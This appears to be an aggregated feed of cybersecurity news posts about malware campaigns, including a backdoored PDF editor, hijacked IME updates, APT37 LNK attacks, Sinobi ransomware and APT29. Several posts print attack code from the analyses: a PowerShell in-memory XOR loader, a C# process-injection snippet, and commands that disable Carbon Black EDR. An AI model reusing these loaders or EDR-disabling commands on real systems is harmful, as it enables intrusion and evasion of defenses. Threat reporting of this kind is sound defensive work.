1010.cx

  • AppSuite PDF Editor Hacked to Execute Arbitrary Commands on The Infected System

    ·

    , ,

    A sophisticated malware campaign has emerged targeting users seeking free PDF editing software, with cybercriminals distributing a malicious application masquerading as the legitimate “AppSuite PDF Editor.”

    The malware, packaged as a Microsoft Installer (MSI) file, has been distributed through high-ranking websites designed to appear as legitimate download portals for productivity tools.

    These deceptive sites share striking similarities to previously identified trojan distribution networks, including the notorious JustAskJacky campaign.

    The threat actors behind this campaign have demonstrated unprecedented boldness by submitting their malware to antivirus companies as false positives, attempting to have security detections removed.

    Initially flagged as a potentially unwanted program, the application appeared to offer legitimate PDF editing functionality while concealing its true malicious nature.

    The installer, created using the open-source WiX toolset, immediately downloads the actual PDF editor program from vault.appsuites.ai upon execution and acceptance of the End User License Agreement.

    G Data researchers identified the malware as a classic trojan horse containing a sophisticated backdoor component.

    Their analysis revealed that the application is built on the Electron framework, allowing it to function as a cross-platform desktop application using JavaScript.

    The researchers noted that the malware has generated significant download activity, with over 28,000 download attempts recorded in their telemetry within a single week, highlighting the campaign’s extensive reach and potential impact on users worldwide.

    The malware operates through a complex system of command-line switches that control various backdoor functionalities.

    When executed without specific parameters, the application initiates an installation routine that registers the infected system with command and control servers located at appsuites.ai and sdk.appsuites.ai.

    The registration process involves obtaining a unique installation ID and creating persistent scheduled tasks named “PDFEditorScheduledTask” and “PDFEditorUScheduledTask” that ensure the malware remains active on the compromised system.

    Advanced Persistence and Command Execution Mechanisms

    The most concerning aspect of the AppSuite PDF Editor malware lies in its sophisticated command execution capabilities and persistence mechanisms.

    The malware employs multiple command-line switches that translate into what the developers internally refer to as “wc routines,” including –install, –ping, –check, –reboot, and –cleanup functions.

    Each routine serves a specific purpose in maintaining system compromise and facilitating remote control.

    The backdoor’s most dangerous feature is its ability to execute arbitrary commands on infected systems through server-supplied command templates.

    The malware contacts sdk.appsuites.ai/api/s3/options to retrieve flexible command templates that can be dynamically adjusted by the threat actors.

    This architecture allows attackers to adapt their approach based on the specific environment and security posture of each compromised system.

    // Command template execution mechanism
hxxps://sdk.appsuites(dot)ai/api/s3/options

    The persistence strategy involves creating multiple scheduled tasks with carefully calculated execution delays.

    The primary scheduled task executes 1 day, 0 hours, and 2 minutes after installation, specifically designed to evade automatic sandbox detection systems that typically do not monitor for such extended periods.

    PDF editor is advertised on various websites with different designs (Source – G Data)

    Additionally, the malware targets popular browsers including Wave, Shift, OneLaunch, Chrome, and Edge, extracting encryption keys and manipulating browser preferences to maintain long-term access to user data and credentials.

    MSI file metadata showing WiX Toolset origins (Source – G Data)

    The malware’s communication protocol utilizes AES-128-CBC and AES-256-CBC encryption for secure data transmission with command and control servers, making network-based detection significantly more challenging for traditional security solutions.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post AppSuite PDF Editor Hacked to Execute Arbitrary Commands on The Infected System appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • New TAOTH Campaign Exploits End-of-Support Software to Distribute Malware and Collect Sensitive Data

    ·

    , ,

    In June 2025, a previously undocumented campaign leveraging end-of-support software began surfacing in telemetry data gathered across Eastern Asia. Dubbed TAOTH, the operation exploits an abandoned Chinese input method editor (IME), Sogou Zhuyin, to deliver multiple malware families.

    Initial intelligence indicated that victims, primarily traditional Chinese users and dissidents, downloaded what appeared to be legitimate updates before their systems were compromised.

    The unexpected revival of a discontinued IME update server enabled threat actors to hijack software distribution and covertly install backdoors, spy tools, and loaders without raising suspicion.

    Trend Micro researchers identified a surge in malicious activity when the lapsed domain for Sogou Zhuyin, dormant since mid-2019, began serving a malicious installer as early as November 2024. The compromised updater, ZhuyinUp.exe, connects to a weaponized update configuration endpoint to retrieve the payload manifest.

    Infected systems subsequently download one of four distinct malware families—TOSHIS, DESFY, GTELAM, or C6DOOR—each designed for reconnaissance, information theft, persistence, or remote access.

    Over several months, hundreds of high-value individuals, including journalists, technology executives, and activists across Taiwan, Hong Kong, Japan, and overseas Taiwanese communities, fell victim to these silent intrusions.

    Trend Micro analysts noted that the campaign’s sophistication lies not only in its use of an abandoned software supply chain but also in its multi-stage infection process.

    By combining hijacked software updates with spear-phishing operations, the threat actors achieved broad distribution and selective targeting. Victims who clicked on a malicious link or opened a decoy document found their desktops compromised within hours.

    Post-infection telemetry revealed additional reconnaissance activities, such as directory enumeration, environment fingerprinting, and secure tunnel creation via legitimate cloud services.

    In one key discovery, Trend Micro researchers identified how ZhuyinUp.exe retrieves the malicious update configuration:-

    sub_440110(L"https://srv-pc.sogouzhuyin.com/v1/upgrade/version", config_buffer);
wcscpy_s(Destination, 100, L"SOGOU_UPDATER");
sub_419620(Destination, (int)this, flags);

    This snippet demonstrates how the updater queries a remote server for the next payload.

    The infection chain for the first operation (Source – Trend Micro)

    The configuration file returned contains URLs, MD5 hashes, and file sizes, enabling the attacker to verify and execute only their crafted binaries.

    Infection Mechanism and Persistence

    Once the malicious updater launches, the chosen payload—often TOSHIS—patches the entry point of a legitimate executable to inject shellcode.

    The loader calculates API function hashes using an Adler-32 algorithm, then downloads and decrypts the final backdoor payload with a hard-coded AES key (qazxswedcvfrtgbn).

    The infection chain for the second operation (Source – Trend Micro)

    In the case of C6DOOR, the Go-based backdoor supports HTTP and WebSocket communication and allows operators to execute shellcode, capture screenshots, and transfer files via SFTP.

    To maintain persistence, the malware registers a service named “SOGOU_UPDATER” under the LocalSystem account, ensuring that the compromised IME re-invokes the update routine on each system start.

    By abusing native Windows update mechanisms and embedding itself in trusted processes, TAOTH remains highly stealthy, evading most traditional endpoint defenses.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post New TAOTH Campaign Exploits End-of-Support Software to Distribute Malware and Collect Sensitive Data appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Weaponized PDFs and LNK Files Used in Windows Attacks

    ·

    , ,

    A clandestine campaign in which threat actors are weaponizing a legitimate-looking PDF document, titled “국가정보연구회 소식지 (52호)” (National Intelligence Research Society Newsletter – Issue 52), alongside a malicious Windows shortcut (LNK) file named 국가정보연구회 소식지(52호).pdf.LNK. The attackers distribute both files together—either within the same archive or as seemingly related attachments. When victims open the LNK […]

    The post Weaponized PDFs and LNK Files Used in Windows Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Defense One Radio, Ep. 192: Alpine Eagle’s Jan-Hendrik Boelens

    ·

    Apple Podcasts

    Guest:

    • Jan-Hendrik Boelens, co-founder and CEO of Alpine Eagle
    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Hackers Weaponize PDF Along With a Malicious LNK File to Compromise Windows Systems

    ·

    , ,

    Attackers have begun leveraging a seemingly innocuous PDF newsletter alongside a malicious Windows shortcut (LNK) file to infiltrate enterprise environments.

    The attack surfaced in late August 2025, targeting South Korean academic and government institutions under the guise of a legitimate “국가정보연구회 소식지 (52호)” PDF newsletter.

    Victims receive an archive containing both the PDF decoy and a companion .lnk file masquerading as the newsletter. When the shortcut is executed, a multi‐stage PowerShell loader embedded within the LNK unpacks and deploys additional payloads entirely in memory, evading disk‐based detection.

    Early analysis revealed that the LNK file hides three binary payloads at precise offsets: a decoy PDF at offset 0x0000102C, a loader binary at 0x0007EDC1, and a final executable at 0x0015AED2.

    Upon execution, a PowerShell one-liner within the LNK reads these offsets, writes the binaries to %TEMP% as aio0.dat, aio1.dat, and aio1+3.b+la+t, and then kicks off a batch script (aio03.bat) to decode and run the loader.

    Seqrite analysts noted that this fileless approach allows the attackers to bypass signature‐based defenses by never writing the ultimate payload to disk.

    Subsequent investigation by Seqrite researchers identified that the final payload, once decrypted with a single‐byte XOR key (0x35), is injected directly into memory via Windows API calls—GlobalAlloc, VirtualProtect, and CreateThread.

    This reflective DLL injection technique ensures that the malicious code executes in a stealthy manner, leaving minimal forensic artifacts.

    Detailed reverse engineering of the loader binary uncovered environment checks for VMware tools and sandbox evasion routines that prevent execution in analysis environments, confirming the high sophistication of the threat actor known as APT37.

    Campaign 1 infection chain (Source – Seqrite)
    $exePath = "$env:temp\tony31.dat"
$exeFile = Get-Content -Path $exePath -Encoding Byte
$key = 0x37
for ($i = 0; $i -lt $exeFile.Length; $i++) {
    $exeFile[$i] = $exeFile[$i] -bxor $key
}
$buf = [Win32]::GlobalAlloc(0x40, $exeFile.Length)
[Win32]::VirtualProtect($buf, $exeFile.Length, 0x40, [ref]$old)
[Win32]::RtlMoveMemory($buf, $exeFile, $exeFile.Length)
[Win32]::CreateThread(0,0,$buf,0,0,[ref]$null)

    Infection Mechanism

    The infection begins when the user double‐clicks the deceptive .lnk file, which triggers PowerShell under the hood.

    Campaign 2 infection chain (Source – Seqrite)

    The script parses its own binary content using Get-Item and ReadAllBytes, extracting the decoy PDF for display while staging the real payloads.

    Once staged, the batch loader executes Invoke-Expression on a UTF-8 decoded script stored in aio02.dat, which in turn orchestrates the XOR decryption and reflective injection of aio01.dat.

    By leveraging in-memory execution, the attackers sidestep conventional endpoint protection platforms that rely on disk‐based scanning.

    This layered infection chain, combining decoy documents, embedded payloads, and fileless techniques, underlines the evolving sophistication of state‐sponsored cyber espionage campaigns.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Hackers Weaponize PDF Along With a Malicious LNK File to Compromise Windows Systems appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • VS Code Marketplace Abused by Threat Actors to Deliver Malware via Trusted Extensions

    ·

    , ,

    A recently uncovered vulnerability in the Visual Studio Code (VS Code) Marketplace has allowed malicious actors to hijack discontinued extension names and slip malware past unsuspecting developers. In June, ReversingLabs (RL) researchers discovered a new malicious extension, ahbanC.shiba, that bore the same “shiba” identifier as a ransomware-capable extension removed in March—despite official documentation asserting extension […]

    The post VS Code Marketplace Abused by Threat Actors to Deliver Malware via Trusted Extensions appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cyber Attacks Targeting Education Sector Surges Following Back-to-School Season

    ·

    , ,

    As students and staff returned to campuses this August, a stark rise in cyber attacks against educational institutions has been observed worldwide.

    From January to July 2025, organizations in the education sector endured an average of 4,356 weekly attacks, marking a 41 percent year-over-year increase. These assaults range from credential-harvesting phishing domains to sophisticated delivery of malicious code aimed at compromising networks and exfiltrating sensitive data.

    The emergence of themed phishing campaigns timed to the back-to-school rush has amplified both volume and sophistication of these threats, exploiting end-user urgency and reliance on digital platforms.

    Attacks have struck uniformly across all regions, but Asia-Pacific organizations faced the heaviest onslaught, with 7,869 average weekly attacks per organization.

    North America saw the steepest spike, rising 67 percent YoY, while Europe and Africa recorded increases of 48 percent and 56 percent respectively.

    At the country level, Italy led with 8,593 attacks per organization, followed by Hong Kong at 5,399, Portugal at 5,488, and the United States at 2,912.

    Check Point analysts noted that the scale and timing of these surges indicate attackers are leveraging the seasonal spike in digital activity to maximize impact and evade detection.

    Beyond sheer volume, attackers have refined their techniques. In July alone, over 18,000 new domains mimicking academic institutions were registered, with one in every 57 flagged as malicious or suspicious.

    These domains often host impersonation pages that mimic Microsoft’s login interfaces. Check Point researchers identified multiple campaigns where malware payloads were delivered via seemingly benign SVG attachments or QR-encoded PDF forms, enabling credential theft and the deployment of secondary loaders.

    Infection Mechanism

    A deeper look at the malware’s infection chain reveals a multi-stage process designed for persistence and evasion.

    Initial compromise begins with a phishing email containing either a crafted SVG file or a PDF disguised as a university communication.

    When opened, the SVG invokes an embedded JavaScript that fetches a payload from a typo-squatted domain.

    // Simplified loader injection snippet
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

class Injector {
    [DllImport("kernel32.dll")] static extern IntPtr OpenProcess(int a, bool b, int c);
    [DllImport("kernel32.dll")] static extern bool WriteProcessMemory(IntPtr h, IntPtr addr, byte[] data, int size, out IntPtr written);
    [DllImport("kernel32.dll")] static extern IntPtr CreateRemoteThread(IntPtr h, IntPtr lp, uint sz, IntPtr start, IntPtr arg, uint flags, out IntPtr id);

    static void Main(string[] args) {
        Process target = Process.Start("svchost.exe");
        IntPtr h = OpenProcess(0x1F0FFF, false, target.Id);
        byte[] shellcode = Convert.FromBase64String("..."); // encrypted payload
        WriteProcessMemory(h, target.MainModule.BaseAddress, shellcode, shellcode.Length, out _);
        CreateRemoteThread(h, IntPtr.Zero, 0, target.MainModule.BaseAddress, IntPtr.Zero, 0, out _);
    }
}

    The payload is a .NET executable that decrypts in memory and drops a lightweight malware loader into the Windows Startup folder for persistence.

    MetricValue
    Average Weekly Attacks (Global)4,356
    Year-over-Year Increase+41 percent
    APAC Average Weekly Attacks7,869
    North America YoY Increase+67 percent
    Europe YoY Increase+48 percent
    Africa YoY Increase+56 percent
    Italy Attacks per Organization8,593
    United States Attacks per Organization2,912
    Malicious Academic-themed Domains (July)1 in 57

    Detection evasion is achieved using process hollowing: the loader spawns a legitimate process (e.g., svchost[.]exe), unmaps its memory, and injects malicious code into the hollowed instance.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Cyber Attacks Targeting Education Sector Surges Following Back-to-School Season appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Hackers Leverage Compromised Third-Party SonicWall SSL VPN Credentials to Deploy Sinobi Ransomware

    ·

    , ,

    A sophisticated ransomware attack has emerged targeting organizations through compromised third-party managed service provider (MSP) credentials, showcasing the evolving tactics of cybercriminals in 2025.

    The Sinobi Group, operating as a Ransomware-as-a-Service (RaaS) affiliate, successfully infiltrated corporate networks by exploiting SonicWall SSL VPN credentials mapped to over-privileged Active Directory accounts with domain administrator rights.

    The attack campaign demonstrates a concerning trend where threat actors leverage trusted third-party relationships to gain initial network access, bypassing traditional perimeter defenses.

    Once inside the network, the attackers established persistence by creating new administrator accounts and executing lateral movement across the compromised infrastructure, ultimately deploying the Sinobi ransomware payload across local and shared network drives.

    eSentire analysts identified significant code overlaps between Sinobi and the previously known Lynx ransomware, suggesting that Sinobi represents a rebrand of the Lynx RaaS operation that first emerged in 2024.

    The security researchers noted with medium confidence that the Lynx group likely purchased the INC Ransomware source code from a user named “salfetka” through underground hacking forums, indicating the commercialization of ransomware development tools.

    Lynx vs Sinobi leak-site comparison (Source – eSentire)

    The malware’s technical sophistication becomes apparent through its systematic approach to disabling security controls and maximizing encryption impact.

    Upon gaining access, the threat actors attempted to uninstall Carbon Black EDR using both Revo Uninstaller and command-line operations, eventually succeeding after discovering deregistration codes stored on mapped network drives.

    Advanced Encryption and Data Exfiltration Mechanisms

    The Sinobi ransomware employs a robust cryptographic implementation using Curve-25519 Donna combined with AES-128-CTR encryption, making file recovery impossible without the attacker’s private key.

    The malware generates unique encryption keys for each file through the CryptGenRandom function, ensuring cryptographically secure key generation that eliminates potential decryption opportunities.

    Prior to encryption, the ransomware systematically prepares the target environment by deleting volume shadow copies through a sophisticated technique utilizing DeviceIOControl with the IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE control code.

    The malware executes the following command sequence:-

    sc config cbdefense start= disabled
cmd /c sc config cbdefense binpath= "C:\programdata\bin.exe" & shutdown /r /t 0

    Data exfiltration occurs through RClone, a legitimate cloud transfer utility, directing stolen information to servers operated by Global Connectivity Solutions LLP, a hosting provider frequently observed in cyberattacks.

    Ransom note wallpaper (Source – eSentire)

    The ransomware creates encrypted files with the .SINOBI extension and deploys README.txt ransom notes containing Tor-based communication channels and payment instructions, demanding victims negotiate within seven days to prevent data publication on dark web leak sites.

    The attack underscores the critical importance of implementing strict privilege management for remote access accounts and avoiding storage of security tool deregistration codes in accessible network locations.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Hackers Leverage Compromised Third-Party SonicWall SSL VPN Credentials to Deploy Sinobi Ransomware appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • AppSuite PDF Editor Exploit Lets Hackers Run Arbitrary Commands

    ·

    , ,

    A sophisticated backdoor in AppSuite PDF Editor that enables threat actors to execute arbitrary commands on compromised Windows systems. Initially flagged as a potentially unwanted program due to its aggressive installation behavior, AppSuite’s true nature was revealed when its malicious components were deobfuscated and analyzed. Threat actors exploited high-ranking PDF tool websites to distribute a […]

    The post AppSuite PDF Editor Exploit Lets Hackers Run Arbitrary Commands appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Amazon Disrupts APT29 Watering Hole Campaign Abusing Microsoft Device Code Authentication

    ·

    Amazon on Friday said it flagged and disrupted what it described as an opportunistic watering hole campaign orchestrated by the Russia-linked APT29 actors as part of their intelligence gathering efforts. The campaign used “compromised websites to redirect visitors to malicious infrastructure designed to trick users into authorizing attacker-controlled devices through Microsoft’s device code

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶